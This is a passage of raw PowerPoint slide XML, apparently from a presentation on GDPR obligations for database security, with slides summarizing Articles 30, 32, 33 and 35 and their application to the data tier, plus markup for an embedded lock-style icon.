            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="479673" y="3301341"/>
              <a:ext cx="5456723" cy="753476"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">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2353" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Segoe UI Semilight"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>GDPR Article 32—Security of processing</a:t>
              </a:r>
            </a:p>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1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="Rectangle 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F16C522-A6A8-43F0-A6E6-E3FAF18316E0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="481355" y="3948545"/>
              <a:ext cx="5233876" cy="659291"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln>
              <a:noFill/>
            </a:ln>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 typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:buChar char="►"/>
                <a:tabLst/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" sz="1765" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Segoe UI Semilight"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t> Use pseudonymization and encryption, ensure availability, conduct regular security testing</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="33" name="Group 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A99B8CE3-4628-407E-833E-D9BBFF114102}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="306766" y="4920092"/>
            <a:ext cx="5571667" cy="1654237"/>
            <a:chOff x="434740" y="5060126"/>
            <a:chExt cx="5474886" cy="1687648"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="00B0F0"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Rectangle 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{730BF59A-6080-45A0-8D79-68181C89107C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="434740" y="5060126"/>
              <a:ext cx="5474886" cy="1687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2" name="TextBox 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7318843-80FE-4914-AF8C-9EBF3F1FC096}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="553746" y="5170895"/>
              <a:ext cx="5140642" cy="1130214"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:grpFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">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2353" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Segoe UI Semilight"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>GDPR Article 33—Notification of a personal data breach</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914192" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
                <a:tabLst/>
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr kumimoji="0" lang="en-US" sz="1765" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="Rectangle 22">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{815FDC8C-79F6-44EB-9E86-1026D51C57CF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="553746" y="6094225"/>
              <a:ext cx="5233876" cy="648396"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:grpFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>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 typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:buChar char="►"/>
                <a:tabLst/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" sz="1765" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Segoe UI Semilight"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t> Detect breach, assess impact, take measures to address </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="35" name="Group 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C98E501-AE80-4349-A1F2-704AADD4E307}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6354332" y="3709374"/>
            <a:ext cx="5571667" cy="1655778"/>
            <a:chOff x="6422625" y="3865442"/>
            <a:chExt cx="5474886" cy="1689220"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Rectangle 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D4CA944-E878-4439-9FCE-BA3B915CF7B4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6422625" y="3865442"/>
              <a:ext cx="5474886" cy="16892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4" name="TextBox 23">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BBD19ED6-6D71-40A0-B9C8-17E69F76FEFE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6604446" y="4016598"/>
              <a:ext cx="5140642" cy="847660"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:grpFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914192" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
                <a:tabLst/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" sz="2353" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Segoe UI Semilight"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>GDPR Article 35—Data protection impact assessment</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="Rectangle 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A356E345-1BBE-4EAC-8A7E-DACF10E2539A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6604447" y="4973387"/>
              <a:ext cx="5233876" cy="376738"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:grpFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>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 typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:buChar char="►"/>
                <a:tabLst/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" sz="1765" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Segoe UI Semilight"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" sz="1765" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Segoe UI Semilight"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>Document risks and security measures </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="34" name="Group 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DCF72960-A141-432E-BC62-E22FE967D436}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6354332" y="1894077"/>
            <a:ext cx="5571667" cy="1627781"/>
            <a:chOff x="6392462" y="1935345"/>
            <a:chExt cx="5474886" cy="1660657"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod val="25000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Rectangle 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{615728D0-ABDF-48C1-A146-8D132654C5A2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6392462" y="1935345"/>
              <a:ext cx="5474886" cy="1660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6" rIns="91414" bIns="45706" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="ctr" anchorCtr="0" forceAA="0" compatLnSpc="1">
              <a:prstTxWarp prst="textNoShape">
                <a:avLst/>
              </a:prstTxWarp>
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="914192" marR="0" lvl="2" indent="0" algn="l" defTabSz="914192" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFont typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:buChar char="►"/>
                <a:tabLst/>
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr kumimoji="0" lang="en-US" sz="1961" b="1"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 name="Rectangle 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02632C53-6ECF-4C91-83A9-3F4456B73808}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6574283" y="2083512"/>
              <a:ext cx="5233876" cy="847660"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:grpFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="457025" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
                <a:tabLst/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" sz="2353" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Segoe UI Semilight"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>GDPR Article 30—Records of processing activities</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" sz="2353" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF">
                    <a:lumMod val="95000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="Rectangle 29">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C340047B-D6F2-48BF-BCEF-E90C33A6579D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6574283" y="3062676"/>
              <a:ext cx="5233876" cy="376738"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:grpFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914192" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFont typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:buChar char="►"/>
                <a:tabLst/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" sz="1765" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Segoe UI Semilight"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>  Monitor access, maintain audits</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="178164713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6F19-F0EB-4A03-B658-9799C2F9DD67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Applicability to the data tier</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D8E1E76-4670-4113-805E-EFC12E02F1B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274638" y="2422525"/>
            <a:ext cx="4656137" cy="2841625"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4704">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Databases store much of an organization’s sensitive data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44131FC5-8C27-41B7-ABEB-5916B88779A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5239657" y="1633539"/>
            <a:ext cx="6173406" cy="4815710"/>
            <a:chOff x="3914532" y="3744805"/>
            <a:chExt cx="2277555" cy="1767128"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:graphicFrame>
          <p:nvGraphicFramePr>
            <p:cNvPr id="6" name="Object 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04A7AF8B-5B1C-4646-AC73-2C70135AB5C6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </p:cNvGraphicFramePr>
            <p:nvPr/>
          </p:nvGraphicFramePr>
          <p:xfrm>
            <a:off x="3914532" y="3744805"/>
            <a:ext cx="2277555" cy="1578423"/>
          </p:xfrm>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
              <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                  <p:oleObj spid="_x0000_s94219" name="CorelDRAW" r:id="rId4" imgW="1344183" imgH="931137" progId="CorelDraw.Graphic.17">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="CorelDRAW" r:id="rId4" imgW="1344183" imgH="931137" progId="CorelDraw.Graphic.17">
                    <p:embed/>
                    <p:pic>
                      <p:nvPicPr>
                        <p:cNvPr id="6" name="Object 5">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04A7AF8B-5B1C-4646-AC73-2C70135AB5C6}"/>
                            </a:ext>
                          </a:extLst>
                        </p:cNvPr>
                        <p:cNvPicPr/>
                        <p:nvPr/>
                      </p:nvPicPr>
                      <p:blipFill>
                        <a:blip r:embed="rId5"/>
                        <a:stretch>
                          <a:fillRect/>
                        </a:stretch>
                      </p:blipFill>
                      <p:spPr>
                        <a:xfrm>
                          <a:off x="3914532" y="3744805"/>
                          <a:ext cx="2277555" cy="1578423"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </p:spPr>
                    </p:pic>
                  </p:oleObj>
                </mc:Fallback>
              </mc:AlternateContent>
            </a:graphicData>
          </a:graphic>
        </p:graphicFrame>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Freeform 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89EBA57D-DE94-4AFE-A7D4-23D7D86ABA6B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeAspect="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5650006" y="4966646"/>
              <a:ext cx="506009" cy="545287"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1407693" h="1585061">
                  <a:moveTo>
                    <a:pt x="727084" y="1101630"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="727305" y="1101630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="727157" y="1101892"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="671601" y="1101630"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="671822" y="1101630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="671749" y="1101892"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="707320" y="531266"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="761703" y="531060"/>
                    <a:pt x="807433" y="592034"/>
                    <a:pt x="809287" y="623345"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="811106" y="654060"/>
                    <a:pt x="809356" y="690723"/>
                    <a:pt x="809313" y="724582"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="596682" y="724582"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="596639" y="691338"/>
                    <a:pt x="595085" y="670420"/>
                    <a:pt x="596701" y="623345"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="598349" y="575348"/>
                    <a:pt x="652938" y="531471"/>
                    <a:pt x="707320" y="531266"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="704848" y="461434"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="617919" y="461846"/>
                    <a:pt x="529547" y="530648"/>
                    <a:pt x="529960" y="622727"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="529960" y="725226"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="496208" y="728119"/>
                    <a:pt x="469840" y="756526"/>
                    <a:pt x="469840" y="791091"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="469840" y="1057120"/>
                  </a:lnTo>
                  <a:cubicBezTo>
